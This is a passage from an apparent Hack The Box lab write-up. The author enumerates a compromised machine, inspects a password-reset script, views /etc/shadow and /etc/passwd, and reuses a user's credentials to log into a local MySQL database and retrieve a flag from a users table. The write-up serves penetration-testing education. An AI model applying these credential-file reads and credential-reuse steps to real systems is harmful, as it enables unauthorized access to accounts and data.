Last login: Wed Nov 10 02:51:52 2021 from 10.10.14.20Now that we’re in, the first thing I wanted to do was examine the /opt/tom-recovery.sh file that I found earlier, which had something to do with possibly resetting accounts.
find / -name "tom-recovery.sh" 2>/dev/nullIt goes without saying it was located at /opt/tom-recovery.sh, but I had to make sure myself, as it could have been moved and the SNMP log we saw earlier might not have been the latest.
These are the contents of /opt/tom-recovery.sh; it didn't leave much room to maneuver:
#!/bin/bash
echo $1:$2 | chpasswdRemembering the main objective of finding user HTB’s password, I went ahead and viewed /etc/shadow and /etc/passwd to see if HTB was listed anywhere. However, /etc/shadow didn't contain that user, and /etc/passwd also didn’t list HTB. There was, however, a MySQL server user listed. I checked whether it was actively listening:
ss -tulpn | grep 3306tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:* Now that it was confirmed MySQL was running on the target machine, I tried logging in with Tom’s credentials to see if that would work and it did.
mysql -u tom -pAfter that, I proceeded to enumerate and see what databases were present, and there was one that stood out (users).
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.02 sec)mysql> use users;
-----------------------
Database changed
mysql> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
1 row in set (0.01 sec)
I ran a simple query to get the list of all users; alternatively, I could have filtered for just one user. Either way, the flag was there.
mysql> select * from users;
OR
mysql> select * from users where username = "HTB";
